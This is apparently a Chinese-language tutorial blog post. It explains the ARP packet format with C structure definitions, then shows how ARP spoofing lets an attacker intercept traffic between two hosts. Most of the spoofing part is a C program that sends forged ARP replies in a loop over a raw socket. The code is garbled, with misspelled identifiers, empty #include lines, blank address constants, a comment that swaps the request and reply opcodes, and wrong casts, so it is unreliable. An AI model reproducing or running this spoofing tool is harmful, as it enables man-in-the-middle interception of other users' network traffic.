ARP数据包格式、ARP欺骗编程实现

 注意：并不是在有ARP请求时，才会有APR响应数据包。

首先介绍ARP协议的报文格式。

结构ether_header定义了以太网帧首部；结构arphdr定义了其后的5个字段，其信息
用于在任何类型的介质上传送ARP请求和回答；ether_arp结构除了包含arphdr结构外，
还包含源主机和目的主机的地址。

定义常量

#define EPT_IP   0x0800    /* type: IP */
#define EPT_ARP   0x0806    /* type: ARP */
#define EPT_RARP 0x8035    /* type: RARP */
#define ARP_HARDWARE 0x0001    /* Dummy type for 802.3 frames */
#define ARP_REQUEST 0x0001    /* ARP request */
#define ARP_REPLY 0x0002    /* ARP reply */

定义以太网首部
typedef struct ehhdr 
{
unsigned char eh_dst[6];   /* destination ethernet addrress */
unsigned char eh_src[6];   /* source ethernet addresss */
unsigned short eh_type;   /* ethernet pachet type */
}EHHDR, *PEHHDR;

定义以太网arp字段
typedef struct arphdr
{
//arp首部
unsigned short arp_hrd;    /* format of hardware address */
unsigned short arp_pro;    /* format of protocol address */
unsigned char arp_hln;    /* length of hardware address */
unsigned char arp_pln;    /* length of protocol address */
unsigned short arp_op;     /* ARP/RARP operation */

unsigned char arp_sha[6];    /* sender hardware address */
unsigned long arp_spa;    /* sender protocol address */
unsigned char arp_tha[6];    /* target hardware address */
unsigned long arp_tpa;    /* target protocol address */
}ARPHDR, *PARPHDR;

定义整个arp报文包，总长度42字节
typedef struct arpPacket
{
EHHDR ehhdr;
ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;

APR欺骗如下图所示，攻击者通过向主机B发送arp响应数据包，其中源ip地址为A，但mac地址为攻击者的mac地址，

                                        攻击者通过向主句A发送arp响应数据包，其中源IP地址为B，但mac地址为攻击者的mac地址

通过这样，当主机a与主机b进行通讯中，发送的数据实际由攻击者进行接收。

下面代码为组装arp响应数据包发送出去。

#include
#include
#include
#include
#include
#include

#define SRC_IP ""
#define TAG_IP ""

short SRC_MAC[]={};
short TAG_MAC[]={};
void send_arp_reply();

int main(int argc,char *args[])
{
 while(1)
 {
  send_arp_reply();
  sleep(30);
 }
 return 0;
}

void send_arp_reply()
{
 struct ether_header *eth_hdr;
 struct ether_arp *arp;
 char datagramp[60];
 eth_hdr = (struct ether_header *)datagram;
 memeset(datagram,0,sizeof(datagram));
 
 //set the ethernet header
  eth_hdr->ether_dhost[0]=TAG_MAC[0];
  eth_hdr->ehter_dhost[1]=TAG_MAC[1];
  eth_hdr->ehter_dhost[2]=TAG_MAC[2];
  eth_hdr->ehter_dhost[3]=TAG_MAC[3];
  eth_hdr->ehter_dhost[4]=TAG_MAC[4];
  eth_hdr->ehter_dhost[5]=TAG_MAC[5];

  eth_hdr->ehter_shost[0]=SRC_MAC[0];
  eth_hdr->ehter_shost[1]=SRC_MAC[1];
  eth_hdr->ehter_shost[2]=SRC_MAC[2];
  eth_hdr->ehter_shost[3]=SRC_MAC[3];
  eth_hdr->ehter_shost[4]=SRC_MAC[4];
  eth_hdr->ehter_shost[5]=SRC_MAC[5];

//set arp head
 arp = (struct arp*)(datagram+sizeof(struct ether_header));
 arp->arp_hrd=htons(ARPHRD_ETHER);// yingjian leixing
 arp->arp_pro=htons(ETHERTYPE_IP);// xieyi leixing
 arp->arp_hln = 6; // yingjian dizhi changdu
 arp->arp_pln = 4; // xieyi changdu
 arp->arp_op = htons(2);// 2 wei qingqiubao  1 wei yingdabao
 
 //arp body
 // send MAC and IP
 memcpy((void*)arp->arp_sha,(void*)eth_hdr->ether_shost,6); // source mac

 struct in_addr inadd_sender;
 inet_aton(SRC_IP,&inadd_sender);
 memcpy((void*) arp->arp_spa,(void*)&inadd_sender,4); // source ip

//target MAC and IP
  memcpy((void*)arp->arp_tha,(void*)eth_hdr->ether_dhost,6);// des mac

 struct in_addr inadd_target;
 inet_aton(TAG_IP,&inadd_target);
 memcpy((void*) arp->arp_tpa,(void*)&inadd_target,4); //des ip

 // establish socket
 int fd = socket(AF_INET,SOCK_PACKET,htons(ETH_P_ARP)); //SOCK_PACKET :nei he jiang bu dui shuju jin xing chu li ,zhijie fa song. yi jing guo shi .
 if(fd< 0)
 {
  perror("socket");
  exit(-1);
 }
struct sockaddr sa;
 strcpy(sa.sa_data,"eth0");
 sendto(fd,datagram,sizeof(datagram),0,&sa,sizeof(sa));
 close(fd);
 return;
}